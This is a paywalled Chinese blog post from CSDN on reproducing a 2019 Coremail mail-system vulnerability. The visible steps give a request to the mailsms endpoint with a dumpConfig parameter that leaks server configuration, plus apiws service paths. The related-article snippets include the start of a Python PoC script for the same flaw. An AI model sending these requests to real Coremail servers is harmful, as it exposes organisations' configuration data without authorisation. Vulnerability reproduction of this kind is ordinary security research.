Coremail接口存配置读取漏洞POC

最新推荐文章于 2023-09-19 15:43:10 发布
VIP文章 最新推荐文章于 2023-09-19 15:43:10 发布
阅读量1.5w 收藏 5
点赞数
分类专栏: web安全 漏洞复现 文章标签: WEB安全 Coremail
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41770175/article/details/91971177
版权

Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。

截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户  ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。

 

 

复现手法

1.mailsms

浏览器访问  http://host/mailsms/s?func=ADMIN:appState&dumpConfig=/

出现一些配置文件信息 证明存在该漏洞

出现404或者页面空白 则证明漏洞不存在

 

2.apiws

http://host/apiws/services/

http://host/./apiws/services/

最低0.47元/天 解锁文章
PeiSylon
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CoreMail监管账号配置.docx
12-01
配置coremail监管账号,用于做邮件的归档审计检查用。
关于coremail的0day
谁的博客
06-14 3459
#-- Coding: utf-8 -- #Author: Vulkey_Chen #Email: [email protected] #Website: www.hi-ourlife.com #About: mailsms config dump PoC import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?...
Coremail-0day敏感文件泄露漏洞送附批量检测脚本
god_Zeo的安全博客
06-17 1万+
漏洞介绍 Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年 [1] ,其前身为中国第一套中文电子邮件系统163\126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终...
2023HW漏洞POC/EXP、情报汇总知识库(0820更新)
lurenjia404的博客
08-21 275
分析结论:木马下载器HW总结模板一2023年,与往年的护网“划水”的角色不同 ,领导鼓励(命令)我今年要扛起写护网总结报告的大旗。作为一线“工具人”,写总结材料真的很头疼,相信很多人和我都有同感。于是在护网开始就开始着手准备总结材料,做到雨绸缪,尤其是4月护网结束后,下面还有省级、市级护网,以及7月的建党100周年的安保,估计每次都将会少不了总结报告。特从网上搜集了总结模板,分享给大家。由于每家企业防护手段不一、组织架构不一,并且以下案例必真实,所以完全照抄的可能性不大,所以仅供参考~~~
coremail漏洞_Coremail多个安全漏洞预警
weixin_30880565的博客
01-30 3831
1.安全公告2019年6月14,Coremail发布了3个高危漏洞安全公告,补丁编号:CMXT5-2019-0001,涉及模块apiws,补丁修复IP限制不合理和在路径遍历的漏洞;补丁编号:CMXT5-2019-0002,涉及模块mailsms,补丁修复信息泄露的漏洞;补丁编号:CMXT5-2019-0003,涉及模块wmsvr,补丁修复信息泄露的漏洞、反射型XSS、路径遍历、...
2023HW护网100+个漏洞poc
Yb528970805的博客
09-19 2703
20 . Metabase validate 远程命令执行漏洞CVE-2023-38646。13 . HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC。3 . Adobe ColdFusion 反序列化漏洞CVE-2023-29300。25 . Panabit iXCache网关RCE漏洞CVE-2023-38646。65 . 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC。66 . 泛微E-Office9文件上传漏洞 CVE-2023-2648 POC
2023HW-8月(10-15)53个0day,1day漏洞汇总含POC、EXP
tangshuangsss的专栏
08-16 4048
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介2023HW-8月10-15号0day、1day漏洞汇总(已更新),包含以下漏洞需要自取。链接:https://pan.baidu.com/s/1Tr94yVFSHn_C6YiJcVprAw 提取码:6666通达OAsql注入漏洞 CVE-2023-4165 POC.. 2 通达OAsql注入漏洞 CVE-2023...
[HW必备]|蓝队防守必须排查的57个安全漏洞与解决方案
03-18 5009
一、OA系统 二、E-mail 三、Web中间件 四、源代码管理 五、项目管理系统 六、开源运维监控 七、堡垒机
Coremail 远程命令执行漏洞
Jdjdjjdjdjdje的博客
08-22 1989
OSCS 是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。在 Coremail XT5/XT6 版本中,邮件处理功能在溢出风险,攻击者构造恶意邮件,向任意邮箱地址发送该恶意邮件,当服务器处理邮件时,会触发漏洞,造成任意命令执行等危害。官方公告认为该漏洞不能稳定复现,在实际场景中难以利用,危害有限。
mail敏感配置信息泄露
众生度尽,方证菩提
07-28 1201
生活是美好的,生命在其间又是如此短促。既然活着,就应该好好地活。应该更珍惜自己生命的每个时刻,精神上的消沉无异于自杀。像往日一样正常的投入生活吧,即便是痛苦,也应该被看做是人的正常情感,甚至它是组成我们幸福生活的一个不可缺欠的部分。
eslint-config-coremail:Coremail 项目的通用共享 eslint 配置文件 :copyright: Mailtech Ltd
05-31
Coremail (c) 的 ESLint 配置文件 重要的提示 由于 eslint 6 改变了它的配置解析机制,配置模块不能在项目根目录之外共享。 此项目已更改为插件模块并重命名(仅包名称)。 有关更多信息,请查看此问题: : 用法 要使用此配置,请将其添加到package.json { " devDependencies " : { " eslint " : " 7.4.0 " , " eslint-plugin-coremail " : " 0.4.1 " } } 或手动安装 npm install eslint eslint-plugin-coremail 然后,将其添加到您的.eslintrc.yaml文件中: 使用标准规则 extends : plugin:coremail/standard 应用合规
Coremail-PC(4.0.0.862)_20200507.exe
12-06
Coremail-PC
Coremail-Plugin(4.2.4.15).zip
07-10
Coremail官网已无法下载本插件,产品诞生于1999年,经过十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。截止2010年,Coremail邮件系统产品在国内已拥有超过3亿终端用户,是目前国内拥有邮箱使用用户最多的邮件系统
Coremail邮件系统 2.11.3
10-04
Coremail闪电邮客户端软件是一款优秀的国产电子邮件客户端,是为企业用户打造的企业级邮件客户端软件。提供独创的Coremail私有邮件协议,同时支持POP3、IMAP邮箱协议;可同时管理多个
Phpstudy隐藏后门
热门推荐
Sylon的博客
09-24 3万+
Phpstudy隐藏后门 1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户 9月20日杭州公安微信公众账号发布了“杭州警方通报打击涉网违法犯...
代码审计
Sylon的博客
06-24 1万+
代码审计常用漏洞总结 1.1 审计方法总结 主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯: 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑 可以是一个函数,或者是条小小的条件判断语句。 敏感函数参数回溯,根据敏感函数,逆向追踪参数传递的过程。这个方法是最高效,最常用 的方法。大多数漏...
Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现
Sylon的博客
06-20 1万+
Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现 一、 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-0232,危险级别:高危,CVSS分值:官方评定。 漏洞概述 Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持...
泛微OA系统多版本在命令执行漏洞
Sylon的博客
10-30 1万+
0x01漏洞描述 泛微OA办公系统是一款协调办公软件。 泛微协同商务软件系统在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。 0x02漏洞危害 攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。 0x03影响范围 泛微 e-cology<=9.0 0x04漏洞复现 访问http://url/weaver/bsh.servlet.BshServlet...
Coremail 单点登录
最新发布
04-04
Coremail是一种企业级邮件系统,它提供了单点登录(Single Sign-On,简称SSO)功能,可以实现用户在不同的应用系统中只需登录一次,即可访问其他相关系统而无需再次输入用户名和密码。 Coremail单点登录的实现方式主要有以下几种: 1. 基于Cookie的SSO:用户在登录Coremail系统后,Coremail会生成一个包含用户身份信息的Cookie,并将其储在用户的浏览器中。当用户访问其他相关系统时,这些系统会检查浏览器中的Cookie,从而实现自动登录。 2. 基于Token的SSO:用户在登录Coremail系统后,Coremail会生成一个唯一的令牌(Token),并将其返回给用户。当用户访问其他相关系统时,这些系统会通过验证该令牌的有效性来实现自动登录。 3. 基于统一身份认证(Unified Identity Authentication)的SSO:Coremail可以与企业的统一身份认证系统进行集成,通过该认证系统来实现单点登录。用户在登录Coremail系统后,Coremail会将用户的身份信息发送给认证系统进行验证,并获取认证结果来实现自动登录。 以上是Coremail单点登录的简要介绍,如果您对具体实现细节或其他相关问题有进一步的了解需求,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值